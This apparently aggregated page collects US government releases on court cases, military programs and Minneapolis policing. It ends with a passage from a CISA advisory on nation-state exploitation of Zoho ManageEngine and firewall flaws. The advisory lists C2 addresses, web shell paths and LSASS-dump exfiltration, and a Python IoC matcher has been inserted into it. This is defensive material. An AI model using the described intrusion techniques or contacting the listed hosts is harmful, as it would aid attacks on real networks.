Former White House Advisor Convicted of Contempt of Congress

Source: United States Department of Justice

WASHINGTON – Former White House advisor Peter K. Navarro, 72, of Washington, D.C., was found guilty today by a U.S. District Court jury of two counts of contempt of Congress stemming from his failure to comply with a subpoena issued by the United States House Select Committee to Investigate the January 6th Attack on the United States Capitol.

The announcement was made by U.S. Attorney Matthew M. Graves of the District of Columbia and Assistant Director in Charge David Sundberg, of the FBI’s Washington Field Office. A sentencing hearing is scheduled for Jan. 12, 2024.

According to evidence presented at trial, on Feb. 9, 2022, the Select Committee issued a subpoena to Navarro. The subpoena required him to appear and produce documents to the Select Committee on Feb. 23, 2022, and to appear for a deposition before the Select Committee on March 2, 2022. Navarro refused to appear to give testimony as required by the subpoena and refused to produce documents in compliance with the subpoena.

In its subpoena, the Select Committee said it had reason to believe that Navarro had information relevant to its investigation. Navarro, formerly an advisor to the President on various trade and manufacturing policies, has been a private citizen since departing the White House on Jan. 20, 2021. He was indicted June 2, 2022.

Each count of contempt of Congress carries a minimum of 30 days and a maximum of one year in jail, as well as a fine of up to $100,000. A federal district court judge will determine any sentence after considering the U.S. Sentencing Guidelines and other statutory factors.

The case is being investigated by the FBI’s Washington Field Office. It is being prosecuted by the Fraud, Public Corruption, and Civil Rights Section of the U.S. Attorney’s Office for the District of Columbia. It was tried by Assistant United States Attorneys Elizabeth Aloi and John Crabb Jr., supported by Paralegal Specialist Sonalika Chaturvedi.

Coast Guard rescues 1 from base of cliff near Erie, Pennsylvania

Source: United States Coast Guard

News Release

U.S. Coast Guard 9th District Great Lakes
Contact: 9th District Public Affairs
Office: (216) 902-6020
After Hours: (216) 310-2608
9th District online newsroom

09/03/2023 09:48 PM EDT

DETROIT – The Coast Guard rescued one person from the base of a cliff Sunday, after their kayak capsized offshore near Shores Beach, Erie, Pennsylvania.

District Man Indicted on Armed Carjacking and Other Charges in String of Armed Robberies at Convenience Stores and Gas Stations

Source: United States Department of Justice

WASHINGTON – An 18-count indictment, filed today in the United States District Court for the District of Columbia, charges Shamell Naquan Joyner, 35, of the District of Columbia, with offenses arising out of an armed carjacking and six armed Hobbs Act robberies allegedly committed between April 12 and May 2, 2023. The indictment was announced by U.S. Attorney Matthew M. Graves, Special Agent in Charge Wayne Jacobs, of the FBI Washington Field Office’s Criminal and Cyber Division, and Acting Chief Pamela Smith, of the Metropolitan Police Department (MPD).

According to the indictment, on April 12, 2023, Joyner committed an armed Hobbs Act robbery at the Falcon Fuel gas station and convenience store, located at 1301 13th Street Northwest, stealing money and personal property from the business and two employees while holding them at gunpoint. Joyner also is alleged to have discharged his firearm at two store employees during this robbery, neither of whom was wounded. (The government’s evidence connects this armed robbery to an April 17 armed robbery of an Alexandria, Virginia, 7-Eleven, in which Joyner is also alleged to have discharged his firearm. A store employee working at the time of the Alexandria robbery sustained a non–life threatening gunshot wound to his leg.)

One day after the Falcon Fuel robbery, on April 13, Joyner is alleged to have carjacked a man at gunpoint in the Mount Vernon Triangle neighborhood. Joyner allegedly stole the man’s Honda HR-V and drove it across state lines into Virginia. The government’s evidence shows that Joyner used that car to commit subsequent armed robbery offenses, including an April 15, 2023, armed robbery of the 7-Eleven store at 1100 Vermont Avenue Northwest, in which an employee was held at gunpoint.

On April 30, 2023, Joyner is alleged to have robbed the 7-Eleven store at 7401 Georgia Avenue Northwest and an employee, again at gunpoint. Joyner allegedly robbed another two stores at gunpoint the next day, including the 7-Eleven store at 1325 2nd Street Northeast and the 721 Shop & Run and an employee at 721 H Street Northeast.

Finally, on May 2, 2023, Joyner is alleged to have robbed the 7-Eleven store at 1645 Connecticut Avenue Northwest and an employee, also at gunpoint. Joyner then allegedly committed additional armed robberies in Maryland, including a 7-Eleven store in Montgomery County and an Exxon gas station and employee in Anne Arundel County. During the Exxon robbery, Joyner is alleged to have held the Exxon employee at gunpoint and robbed him of the keys to his Toyota RAV4, which Joyner then stole and drove across state lines into the District of Columbia.

Later that day, in the 400 block of Condon Terrace SE, the Metropolitan Police Department found Joyner in the stolen RAV4’s driver’s seat and arrested him without incident. At the time of his arrest, Joyner was in possession of the firearm used in the armed robberies committed between April 30 and May 2, as well as unique clothing and other evidence that tied him to numerous offenses.

Joyner has been detained since his May 2, 2023, arrest.

“These alleged crimes left numerous victims, store employees, and witnesses terrorized,” said U.S. Attorney Graves. “Those who are driving these pattern and spree robberies in our community need to know that they will be caught and prosecuted to the fullest extent of the law.”

The indictment charges Joyner with 18 counts: six counts of interference with commerce by robbery (also known as “Hobbs Act” robbery), which carries a maximum of 20 years in prison; one count of carjacking, which carries a maximum sentence of 15 years in prison; seven related counts of using, carrying, and possessing a firearm during and in relation to a crime of violence, which carries a mandatory minimum sentence of up to 10 years in prison and a maximum sentence of life in prison; two counts of interstate transportation of a stolen motor vehicle, which carries a maximum sentence of 10 years in prison; and two counts of unlawful possession of a firearm and/or ammunition, which carries a maximum sentence of 15 years in prison. Under the indictment, Joyner faces a mandatory minimum of 52 years in prison. The maximum potential sentences are prescribed by Congress and are provided here for informational purposes only, as any sentence imposed in this case will be determined by a federal district court judge after considering applicable sentencing guidelines and other statutory factors.

This case is being investigated by the FBI’s Washington Field Office’s Violent Crime Task Force and the Metropolitan Police Department’s Carjacking Task Force. Valuable assistance was provided by the Bureau of Alcohol, Tobacco, Firearms and Explosives, and the Alexandria City, Anne Arundel County, Fairfax County, and Prince George’s County Police Departments. The case is being prosecuted by Assistant United States Attorneys Paul V. Courtney and Justin F. Song of the U.S. Attorney’s Office for the District of Columbia.

The investigation into these offenses and potentially related armed robberies of commercial establishments located in the District of Columbia, Maryland, and Virginia remains ongoing. Anyone with tips can call 1-800-CALL-FBI (800-225-5324) or visit tips.fbi.gov.

An indictment is merely an allegation, and all defendants are presumed innocent until proven guilty beyond a reasonable doubt in a court of law.

District Man Sentenced to 6 ½ Year Prison Term For Assaulting Homeless Man with a Tire Iron and Assaulting Elderly Tourist on the Metro

Source: United States Department of Justice

Defendant Committed a String of Crimes in One Day

WASHINGTON – Roscoe Rosborough, 32, of Washington, D.C., was sentenced today to 78 months in prison for two separate assaults that took place on the same day in Northeast and Northwest DC, in February of 2023, announced U.S. Attorney Matthew M. Graves, Special Agent in Charge Wayne A. Jacobs of the FBI Washington Field Office’s Criminal and Cyber Division, and Acting Chief Pamela A. Smith, of the Metropolitan Police Department.

Rosborough pleaded guilty on June 9, 2023, in the Superior Court of the District of Columbia, to one count of assault with a dangerous weapon and one count of assault with significant bodily injury.

According to the government’s evidence, on February 17, 2023, at approximately 4:55 a.m., the defendant entered a homeless shelter, though he was not a resident, and demanded to use the bathroom. After being refused, he continued into the shelter and ran into a resident walking to the cafeteria for breakfast. The defendant pulled out a tire iron from inside his clothing and struck the resident multiple times in the head, causing a laceration to the head that required nine staples.

At approximately 3:30 p.m. that same day, the defendant was on a metro train headed for the Gallery Place – Chinatown station. He approached an elderly couple with their three minor grandchildren visiting from out of town. He got into their faces, unprovoked, and began yelling profanities at them. The 78-year-old grandfather put his hand on the defendant’s arm and said, “back off pal.” The defendant then assaulted the man, punching him, pulling him to the floor, and kicking him. This assault caused the victim to require multiple knee drains and eventually surgery to his knee.

In announcing the sentence, U.S. Attorney Graves, SAC Jacobs, and Acting Chief Smith commended the work of those who investigated the case from the Metropolitan Police Department, the Federal Bureau of Investigation, and the Department of Justice’s Civil Rights Division, specifically Special Agent Deborah Frye, Special Agent John Perren, and Trial Attorney Sanjay Patel. They also expressed appreciation for the work of those who assisted with the case at the U.S. Attorney’s Office, including Assistant U.S. Attorney Gauri Gopal and Victim/Witness Advocates Lakeisha McFall, Jennifer Clark, and Paola Molina.

Finally, they commended the work of Assistant U.S. Attorneys Katie Sessa and Katrenia Shelly, who investigated and prosecuted the case.

District Man Charged in a July 2023 killing at Marie Reed Recreation Center

Source: United States Department of Justice

Defendant allegedly shot the victim in the head during a recreational soccer match

WASHINGTON – Pedro Funes, 33, of Washington, D.C., was charged in Superior Court today with one count of first-degree murder while armed in the homicide of 30-year-old Around Solis on July 26, 2023, in the city’s Adams Morgan neighborhood, U.S. Attorney Matthew M. Graves and Acting Chief Pamela Smith of the Metropolitan Police Department announced.

Funes was arraigned before Magistrate Judge Judith Pipe and entered a plea of not guilty. The court found probable cause to believe that Funes committed the slaying. The court held Funes without bond pending a preliminary hearing to be held on October 4, 2023, before Judge Robert Okun.

An arrest on a complaint is merely a formally charged allegation that a defendant has committed a violation of criminal laws, and every defendant is presumed innocent until, and unless, proven guilty.

In announcing the charge, U.S. Attorney Graves commended the work of those investigating the case from the Metropolitan Police Department and the U.S. Attorney’s Office.

After 5 years, Air Force Junior ROTC Flight Academy changing the face of aviation

Source: United States Air Force

The face of aviation is changing and it’s beginning to look a lot like high school students.

It’s been five years since the first group of cadets buckled up in cockpits in pursuit of an Air Force-sponsored private pilot certificate through the Air Force Junior Reserve Officers’ Training Corps Flight Academy program.

Since the summer of 2018, 1,089 AFJROTC cadets have pursued their dream of becoming a pilot, with 861, or 79%, succeeding. That is a significant achievement considering that outside of the program, the dropout rate for learner pilots is around 80%, according to research by aviation advocacy groups such as the Aircraft Owners and Pilots Association.

Headquarters AFJROTC first started taking Flight Academy scholarship applications in the fall of 2017, with the first aviation classes starting the following summer at six partnering universities. That number has since grown to 24 participating universities in 2023, which includes some of the nation’s leading flight programs like Embry-Riddle Aeronautical University and Purdue University.

The program was initially launched as part of the Air Force Aircrew Crisis Task Force with the stated goals of restoring the luster of aviation for high school students, increasing the pool of pilots for both the military and civilian aviation communities, each facing severe pilot shortages, and increasing diversity in the cockpit.

The AFJROTC Flight Academy accepted the challenge and the program has grown significantly since the initial class of 120 cadets took to the skies in 2018. The COVID-19 pandemic forced the cancellation of the program in 2020.

“All cadets are encouraged to apply for Flight Academy and to consider aviation as a profession,” said Ben Caro, Headquarters AFJROTC Program Development division chief. “It’s fantastic to see the diversity of the cadets interested in the program.”

In 2018, the percentage of underrepresented cadets participating in the Flight Academy was 41%. That number increased each year, with the years 2022 and 2023 each boasting 60% underrepresented groups. Of the 301 AFJROTC cadet participants in 2023, 40% were minorities and 37% female, with 239 receiving their pilot certificate.

“The Flight Academy has generated tremendous interest among our AFJROTC cadet corps with over 9,000 applicants expressing their desire to fly,” said Col. Johnny McGonigal, Headquarters AFJROTC director. “We believe this program meets the Air Force chief of staff’s desire to increase interest in aviation. It also provides an enduring solution for pilot production, while also impacting the diversity challenge facing both the military and civilian aviation communities.”

While the Air Force fully funds the extensive eight-week summer program, there is no requirement for graduates to pursue a military commitment. However, this program has inspired many cadets to take the next step toward becoming a military pilot. Of approximately 591 Flight Academy attendees who have also graduated high school by April 2023, 47% enrolled in the Air Force ROTC program in college to further their goal of becoming an Air Force pilot.

Even for those not pursuing a career in aviation, the academy was a very memorable and valuable experience.

“I highly recommend the flight academy to anyone who is considering it. It was one of the best experiences I have ever had and wouldn’t trade it for anything,” said 2nd Lt. Adam Landry, who completed the Flight Academy program at Delaware State University in 2019. “I made amazing connections and was grateful for the opportunity to learn how to fly. Thanks for the opportunity to attend the academy, I still think back on the memories quite often even though it was four years ago.”

Landry graduated from Syracuse University’s ROTC program in 2023 with a degree in civil engineering.

“I’ve been extremely impressed with the Flight Academy cadets I’ve met and with the outstanding quality of the program overall.”

– Brig. Gen. Houston Cantwell, Jeanne M. Holm Center for Officer Accessions and Citizen Development commander

“Our intent is to help regenerate interest and inspiration in our nation’s youth to pursue careers in aviation and to diversify the industry as a whole,” said Brig. Gen. Houston Cantwell, Jeanne M. Holm Center for Officer Accessions and Citizen Development commander. “With this program, we believe we are changing the face of aviation one cadet at a time.”

For more information about the AFJROTC Flight Academy Program, visit here.

Assistant Attorney General Kristen Clarke Delivers Remarks on Justice Department Findings of Civil Rights Violations by the Minneapolis Police Department and the City of Minneapolis

Source: United States Department of Justice (2022)

Remarks as Delivered

Good morning. My name is Kristen Clarke. I’m the Assistant Attorney General for the Civil Rights Division at the U.S. Department of Justice. At the heart of many of the protests that unfolded in this city, and across the nation, was a call for constitutional, fair and non-discriminatory policing and respect for people’s civil rights.

Today we are here to take an important step toward answering that call and committing to the task of building out a core feature of American democracy – an effective, accountable police department that ensures respect for constitutional rights, garners public trust and keeps people safe.

I want to provide further details about the findings of our civil rights investigation that the Attorney General just announced.

First, we found that the Minneapolis Police Department uses excessive force – both deadly and less lethal.

We reviewed MPD’s 19 police shootings and one in-custody death from January 1, 2016, to August 16, 2022. Many of these incidents were unconstitutional uses of deadly force. We found that officers used deadly force without probable cause to believe that there was an immediate threat of serious physical harm to the officer or another person. In one example, an off-duty officer fired his gun at a car containing six people within three seconds of getting out of his squad car.

Neck restraints are lethal force. And we found that MPD officers often use neck restraints without warning, on people suspected of only minor offenses and on people who posed no threat.

We also reviewed less lethal uses of force – tasers, bodily force and pepper spray.

MPD officers’ use of tasers often is inconsistent with MPD’s own policy and occurs without warning. For example, officers sometimes use multiple, successive taser applications without re-assessing the need for further activations, which can be dangerous. They also use tasers for minor offenses, on kids and on people known to have behavioral health issues.

We found that MPD unconstitutionally uses bodily force and pepper spray against people who have committed minor offenses or no offense at all. In addition, we saw repeated instances of excessive force against kids without appropriate attempts to de-escalate the situation. In one instance, an MPD officer wearing street clothes drew his gun and pinned a teenager to the hood of a car for allegedly taking a $5 burrito without paying.

In addition, we found instances where MPD officers did not adequately ensure the safety of people in their custody. For example, after pepper spraying a group of people who were fighting, MPD officers ignored pleas to call an ambulance for one woman who needed help because she had asthma. Disregarding the medical distress of a person who is in custody or after a use of force is unlawful.

And, often, officers who could have intervened to stop the use of excessive force by their colleagues did not do so. This violates the Constitution.

Our second finding is that the Minneapolis Police Department unlawfully discriminates against Black people in its enforcement activities. This is a first-time finding for us – that the police department also discriminates against Native American people in its enforcement activities.

With our statistical experts, we reviewed over five years of MPD data, from November 1, 2016, to August 9, 2022, on roughly 187,000 traffic and pedestrian stops. We also conducted interviews and ride-alongs, and we reviewed other documents and information that the city provided.

As part of this systemic discrimination, we found that MPD disproportionately stops Black people and Native American people.

During stops involving Black and Native American people, MPD performs searches more frequently than during stops involving white people, even when they behave in similar ways.

MPD also uses force during stops involving Black and Native American people more frequently than they do during stops involving white people, even when they behave in similar ways. This too is another “first” – this is the first time we have made a finding that the police department unlawfully discriminates by using force after stops against Black and Native American people.

Starting in late May 2020 – when George Floyd was killed – MPD officers suddenly ceased reporting race and gender in many stops despite MPD policy requiring them to collect this data. We estimate that the percentage of daily stops with known race data recorded dropped over 35 percentage points during this period. Still, our analyses of the reported racial data from May 25, 2020, to August 9, 2022, showed significant racial disparities in searches and use of force.

Working with our statistical experts, we did not find that there was a legitimate, non-discriminatory reason for such different treatment for Black and Native American people during stops or the other enforcement activities that we examined.

We also found that the MPD violates people’s First Amendment rights by retaliating with force against people engaged in protests and engaged in demonstrations. We saw officers push and pepper spray protesters who posed no threat. Where protesters resisted police commands, officers used force to punish them well after any threat had ended. For example, during a protest in March of 2021, officers beat, kicked and shoved protesters even after they were restrained. One officer, using his full body weight, kneed a passive, restrained protester in the neck as he lay face down – an act that amounted to deadly force.

MPD retaliates against journalists and unlawfully restricts their access during protests. Under the First Amendment, the press must be allowed to safely gather and report the news.

In addition, we found that the police department retaliates against people who challenge or question them during stops and calls for service. The Constitution protects the right to criticize officers, even with profanity. We also found that MPD officers retaliate against people who observe and record them, even though they have a right to do so. All of this violates the law.

Our fourth and final finding is that MPD and the City of Minneapolis discriminate against people with behavioral health disabilities when responding to calls for assistance.

Many calls for service related to behavioral health do not require a law enforcement response. These calls often involve no violence, weapon or immediate threat. And in these circumstances, a law enforcement-led response can lead to trauma, injury and even death to people experiencing behavioral health issues. But these harms may be avoided by dispatching behavioral health responders where appropriate, and they can be mitigated by sending behavioral health responders with police where a law enforcement response may be needed.

To assess MPD’s and the city’s response to behavioral health calls, we analyzed a random sample of behavioral health-related 911 calls to which MPD responded. And we learned that MPD and the city often send the police unnecessarily and that people are harmed as a result. For the vast majority of the calls we reviewed, the person needing behavioral health attention was not reported to have a weapon or to pose an immediate threat. Only 0.45% of over 100,000 mental health calls resulted in an arrest at the scene – this underscores that the current reliance on police-only responses is unwarranted.

In December of 2021, the city launched a mobile crisis response pilot that provides a behavioral health response in addition to, or instead of, a police response. And that program is a step in the right direction, but that pilot effort lacks the capacity to promptly respond to calls throughout the city, and, as a result, MPD continues to be the primary response to behavioral health calls.

These findings are serious, and we enter the path to reform with a plan to put in place lasting and enduring changes that will ensure the constitutional, fair and non-discriminatory policing to which the people in this great city are entitled.

As I close, I want to extend my gratitude to the Mayor and the Police Chief for joining us today and for their collaboration. And I also want to extend deep appreciation to the people across Minneapolis who worked with us at every step of this process. Thanks to residents, community leaders, civil rights advocates, police officers and many others who used their voice in this process. An enormous and important task lies ahead, and we want this community to hear us clearly – we stand with you at every stage of this process that lays ahead.

I’ll turn the floor over to Ann Bildtsen, First Assistant U.S. Attorney for the District of Minnesota.

USAFE-AFAFRICA demonstrates breakthrough mobile MQ-9A satellite launch, recovery package

Source: United States Air Force

The U.S. Air Forces in Europe and Air Forces Africa achieved a significant technological proof of concept for the MQ-9A Reaper’s Satellite Launch and Recovery Package, or SLR-P, at the 12th Unmanned Aerial Vehicle Air Base in Mirosławiec.

While various iterations of the concept have surfaced in different contexts, the SLR-P offers a compact, “wallet-sized” innovation poised to launch and recover the MQ-9A at strategic theater locations situated in some of the most rugged, remote outposts in Europe. This marks a departure from conventional practices that necessitated returning to home stations for basic level maintenance.

“We live in a volatile, uncertain, complex and ambiguous world, which means it takes an innovative and motivated group of people – like what you see here – to influence change and propel us into the future,” said Maj. Philip West, USAFE-AFAFRICA project lead. “With this technology, we’re putting the ‘A’ in ‘ACE’ [Agile Combat Employment] for the MQ-9A.”

Tailored specifically for the European and African theaters, the SLR-P consists of a small, mobile container with an inventory list finely tuned to address the unique operational requirements and environmental nuances of each specific region. The container can be retrofitted with its own wheels to be towed or be carried by any means of available transportation and is designed to be highly mobile.

One of the most dramatic impacts of this concept is to reduce the “boots on the ground” needed to operate and maintain precision aircraft. Where traditional remotely piloted operations required teams of 30 to 150 personnel, the SLR-P can execute with a lean crew of just eight multi-capable Airmen.

This lean crew of multi-capable Airmen came from USAFE-AFAFRICA’s 435th Contingency Response Group.

“Empowering multi-capable Airmen is what we do every day,” said Col. Robert Rayner, 435th CRG commander. “The creation of the CRG 25 years ago aimed to extend airpower beyond our main bases. While our primary mission is supporting mobility operations, we’ve adapted our capabilities to respond to what the Air Force, and specifically what USAFE, needs.”

“Today, we’re launching and recovering MQ-9As, but tomorrow it could be F-16s, and the next day, C-17s. Whatever the requirement, the 435th CRG remains light, lean and lethal to support,” he added.

The SLR-P’s integration with satellite technology also ushers in a new era of connectivity and maintenance efficiency. This capability facilitates rapid power-up of the MQ-9A and seamless satellite link establishment, minimizing pre-mission preparations.

By simplifying maintenance functions, the SLR-P allows the maintenance team to focus solely on essential tasks, leading to reduced downtime and heightened mission readiness.

This successful proof of concept not only marks the emergence of a new era in remotely piloted operations, but it also highlights the steadfast dedication of both the U.S. and Poland to shared security goals and technological progress.

“Hosting this first-ever proof of concept underscores Poland’s commitment to protecting not only Polish sovereignty but also fulfilling its obligation as a pivotal member of the NATO alliance,” said Col. Marcin Szubiński, Polish Air Force’s 12th UAV Air Base commander. “We are proud to contribute to testing this capability, building on our five-year history of implementing cutting-edge ISR technologies within EU airspace by prioritizing interoperability with our NATO allies while refining procedures and capabilities as needed.”

This proof of concept notably commenced amidst challenging weather conditions. Under typical circumstances, the mission for the day might have been canceled; however, the weather in Poland proved to be favorable for testing the system’s resilience, prompting the team to make a pivotal choice – executing a weather diversion to this new field or returning the MQ-9A back to its home station.

Airmen stationed with the Pennsylvania Air National Guard undertook a task unprecedented at this airfield, achieving a milestone that holds immense significance. In the process, they officially designated this location as a future alternate launch site, particularly in periods of adverse weather.

Poland now stands as a destination for America’s most powerful, capable aircraft, ready to serve as an alternate launch location during times of inclement weather. This development further emphasizes the adaptability and resilience that characterize this transformative proof of concept.

Multiple Nation-State Threat Actors Exploit CVE-2022-47966 and CVE-2022-42475

Source: US Department of Homeland Security

SUMMARY

The Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), and Cyber National Mission Force (CNMF) identified the presence of indicators of compromise (IOCs) at an Aeronautical Sector organization as early as January 2023. Analysts confirmed that nation-state advanced persistent threat (APT) actors exploited CVE-2022-47966 to gain unauthorized access to a public-facing application (Zoho ManageEngine ServiceDesk Plus), establish persistence, and move laterally through the network. This vulnerability allows for remote code execution on the ManageEngine application. Additional APT actors were also observed exploiting CVE-2022-42475 to establish presence on the organization’s firewall device.

CISA and co-sealers are releasing this joint Cybersecurity Advisory (CSA) to provide network defenders with tactics, techniques, and procedures (TTPs), IOCs, and methods to detect and protect against similar exploitation.

Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 13. See Tables 3-13 for the APT actors’ activity mapped to MITRE ATT&CK tactics and techniques with corresponding mitigation and/or detection recommendations.

Overview

By request of the impacted organization, CISA conducted an incident response engagement from February to April 2023. CISA and co-sealers assess that beginning as early as January 2023, multiple nation-state APT actors were present on the organization’s network via at least two initial access vectors:

  • Initial Access Vector 1: APT actors exploited CVE-2022-47966 to access the organization’s web server hosting the public-facing application, Zoho ManageEngine ServiceDesk Plus.
  • Initial Access Vector 2: APT actors exploited CVE-2022-42475 to access the organization’s firewall device.

CISA and co-sealers identified an array of threat actor activity, including overlapping TTPs across multiple APT actors. As this activity shows, APT actors routinely scan internet-facing devices for vulnerabilities that can be easily exploited. Firewalls, virtual private networks (VPNs), and other edge network infrastructure continue to be of interest to malicious cyber actors. Once compromised, these devices can be leveraged to expand access into the targeted network, serve as malicious infrastructure, or both.

APT Actor Activity

Initial Access Vector 1

As early as January 2023, APT actors exploited CVE-2022-47966 [T1190] for initial access to the organization’s web server hosting the public-facing application, Zoho ManageEngine ServiceDesk Plus. CISA observed indications in log files that a connection to the known malicious IP address 192.142.226[.]153 was made as part of initial exploitation.

Through exploitation of CVE-2022-47966, APT actors achieved root level access on the web server and created a local user account [T1136.001] named Azure with administrative privileges [T1068]. Actors were further able to download malware, enumerate the network, collect administrative user credentials, and move laterally through the organization’s network. CISA and co-sealers were unable to determine if proprietary information was accessed, altered, or exfiltrated. This was due to the organization not clearly defining where their data was centrally located and CISA having limited network sensor coverage.

Initial Access Vector 2

Additional APT actors exploited CVE-2022-42475 on the organization’s firewall device, as indicated by multiple successful VPN connections from known-malicious IPs between February 1-16, 2023. APT actors compromised and used the disabled, legitimate administrative account credentials [T1078.003] of a previously hired contractor; the organization confirmed the account had been disabled prior to the observed activity.

Analysis identified that a common behavior for these threat actors was to use disabled administrative account credentials and delete logs from several critical servers in the environment [T1070.001]. This prevented detection of follow-on exploitation or data exfiltration. CISA and co-sealers were also unable to track the activity further because the organization did not have Network Address Translation (NAT) IP logging enabled.

APT actors initiated multiple Transport Layer Security (TLS)-encrypted sessions [T1573.002] on Transmission Control Protocol (TCP) port 10443 [T1571], indicating successful data transfer from the firewall device. APT actors were observed connecting to the device from the following actor-controlled C2 IP addresses:

  • 144.202.2[.]71
  • 207.246.105[.]240
  • 45.77.121[.]232
  • 47.90.240[.]218

APT actors further leveraged legitimate credentials to move from the firewall to a web server, where multiple web shells were loaded into the following directories (web shells were also found in other locations, such as the OWA server). Note: The file paths of these web shells were received in coordination with a trusted third party; the artifacts themselves were not received for analysis.

  • c:\Program Files\Microsoft Office Web Apps\RootWebsite\en-us\resource.aspx
  • c:\inetpub\wwwroot\uninet\css\font-awesome\css\discover.ashx
  • c:\inetpub\wwwroot\uninet\css\font-awesome\css\configlogin.ashx
  • c:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\15\template\layouts\approveinfo.aspx
  • c:\Program Files\Microsoft Office Web Apps\RootWebsite\infos.aspx
  • c:\Program Files\Microsoft Office Web Apps\RootWebsite\errorinfo.aspx
  • c:\Program Files\Microsoft Office Web Apps\RootWebsite\infos.ashx
  • c:\Program Files\Microsoft Office Web Apps\RootWebsite\en-us\error.aspx
  • c:\Program Files\Microsoft Office Web Apps\RootWebsite\en-us\infos.aspx
  • c:\Program Files\Microsoft Office Web Apps\RootWebsite\en-us\info.aspx
  • c:\Program Files\Microsoft Office Web Apps\RootWebsite\en-us\info-1.aspx
  • c:\Program Files\Microsoft Office Web Apps\RootWebsite\en-us\new_list.aspx
  • c:\Program Files\Microsoft Office Web Apps\RootWebsite\en-us\errorinfo.aspx
  • c:\Program Files\Microsoft Office Web Apps\RootWebsite\en-us\lgnbotr.ashx
  • c:\inetpub\passwordchange\LECPNJYRH.aspx
  • c:\inetpub\passwordchange\9ehj.aspx
  • c:\inetpub\wwwroot\wss\VirtualDirectories\Portal80\_vti_pvt\services\info.ashx
  • c:\inetpub\wwwroot\wss\VirtualDirectories\Portal80\_vti_pvt\services.aspx
  • c:\inetpub\redirectedSites\[REDACTED]\products\uns1fw.aspx
  • c:\inetpub\redirectedSites\[REDACTED]\products\uns1ew.aspx

The following IP addresses were identified as associated with the loaded web shells:

  • 45.90.123[.]194
  • 154.6.91[.]26
  • 154.6.93[.]22
  • 154.6.93[.]5
  • 154.6.93[.]12
  • 154.6.93[.]32
  • 154.6.93[.]24
  • 184.170.241[.]27
  • 191.96.106[.]40
  • 102.129.145[.]232
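To make the indicator lists above directly usable, here is an added example (not part of the advisory, and not tooling from CISA or the affected organization) that refangs the defanged IP addresses from the two lists and matches them, together with the TCP 10443 session pattern described for the firewall vector, against a few constructed key=value firewall log lines. The log format, the hostname fw01 and the destination address 203.0.113.10 are assumptions; real firewall exports will need their own field names in parse_line.

```python
import ipaddress
import re

# Defanged indicators exactly as the advisory prints them (firewall C2 IPs and
# web shell-associated IPs). Defanging replaces "." with "[.]" so the text cannot
# be clicked or auto-resolved; a matcher has to undo that first.
DEFANGED_IOCS = [
    "144.202.2[.]71", "207.246.105[.]240", "45.77.121[.]232", "47.90.240[.]218",
    "45.90.123[.]194", "154.6.91[.]26", "154.6.93[.]22", "154.6.93[.]5",
    "154.6.93[.]12", "154.6.93[.]32", "154.6.93[.]24", "184.170.241[.]27",
    "191.96.106[.]40", "102.129.145[.]232",
]


def refang(ioc: str) -> str:
    """Turn a defanged indicator such as 1.2.3[.]4 back into a validated IP string."""
    cleaned = ioc.replace("[.]", ".").replace("(.)", ".").replace("{.}", ".")
    # ip_address() raises ValueError on anything that is not a real address,
    # which catches copy/paste damage in an indicator list early.
    return str(ipaddress.ip_address(cleaned))


IOC_SET = frozenset(refang(i) for i in DEFANGED_IOCS)

# Constructed sample lines in a generic key=value syslog style (assumption: not
# real logs; 203.0.113.0/24 and 198.51.100.0/24 are documentation ranges).
SAMPLE_LOGS = [
    "2023-02-03T10:14:02Z fw01 action=accept proto=tcp src=144.202.2.71 sport=51234 dst=203.0.113.10 dport=10443 svc=SSL-VPN",
    "2023-02-03T10:14:09Z fw01 action=accept proto=tcp src=198.51.100.7 sport=40112 dst=203.0.113.10 dport=443 svc=HTTPS",
    "2023-02-05T01:22:41Z fw01 action=accept proto=tcp src=45.77.121.232 sport=60001 dst=203.0.113.10 dport=10443 svc=SSL-VPN",
    "2023-02-05T01:30:00Z fw01 action=accept proto=tcp src=203.0.113.25 sport=50500 dst=203.0.113.10 dport=10443 svc=SSL-VPN",
]

KV_RE = re.compile(r"(\w+)=(\S+)")


def parse_line(line: str) -> dict:
    """Split a key=value log line into a dict; fields that are absent stay absent."""
    return dict(KV_RE.findall(line))


def find_hits(lines, ioc_set=IOC_SET, watched_port="10443"):
    """Return (line_index, reason) for lines whose source IP is a known IoC or
    whose destination port is the watched non-standard port. A line can match
    both, which is the strongest signal; a port-only match is a weaker lead
    that still deserves a look because the actors used TCP 10443 consistently."""
    hits = []
    for idx, line in enumerate(lines):
        fields = parse_line(line)
        src = fields.get("src")
        dport = fields.get("dport")
        reasons = []
        if src in ioc_set:
            reasons.append(f"known C2 IP {src}")
        if dport == watched_port:
            reasons.append(f"session to TCP {watched_port}")
        if reasons:
            hits.append((idx, "; ".join(reasons)))
    return hits


if __name__ == "__main__":
    for idx, reason in find_hits(SAMPLE_LOGS):
        print(f"line {idx}: {reason}")
```

The IoC match is exact by design; the port check is deliberately separate so that a defender can see connections on TCP 10443 from addresses that are not yet on any list, which is how new infrastructure tends to show up.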

Forensic Timeline of APT Actor Activity

Tables 1 and 2 list the timeline of events discovered during the incident response, as well as tools used by the APT actors to conduct their operations, respectively. All timestamps are presented in Coordinated Universal Time (UTC).

Table 1: Timeline of APT Actor Activity

Timestamp (UTC)

Event

Description

2023-01-18 11:57:02

Hello World User-Agent string observed in 44 total events.

Uniform Resource Identifier (URI): /cgi-bin/downloadFlile[.]cgi

Hello World, the User-Agent string inside the initiated HTTP request, was observed during communication between the organization’s web server and malicious command and control (C2) server IP 92.118.39[.]82 [T1071.001]. This string has been reported in open-source research as an initial step used by the Mirai botnet to download malicious artifacts [T1583.005].[1]

2023-01-20

Attempts made to export three files; associated with malicious IP 192.142.226[.]153.

APT actors attempted to export [TA0009], [TA0010] three files, which were analyzed and identified as Local Security Authority Subsystem Service (LSASS) dump files. These files were renamed with .zip and .gif extensions to evade detection [T1036.008]. Analysis confirmed the APT actors were unsuccessful at exfiltrating these files:

  • wo_view_bg.zip (09:06:37 UTC)
  • wo_view_bg1.gif (09:08:11 UTC)
  • wo_view_bg2.gif (09:19:43 UTC)

Note: If local administrative access is achieved on a victim host, dumping LSASS credentials may allow for lateral movement across the environment. This behavior was identified during the engagement and is detailed throughout Table 1.

2023-01-20 16:51:05

Successful web server exploitation via CVE-2022-47966.

Successful web server (Zoho ManageEngine ServiceDesk Plus) exploitation via CVE-2022-47966.

2023-01-21 06:46:42

Azure local user account with administrative permissions created.

A local user account with administrative permissions, named Azure, was created on the server hosting ServiceDesk Plus.

2023-01-21 06:49:40

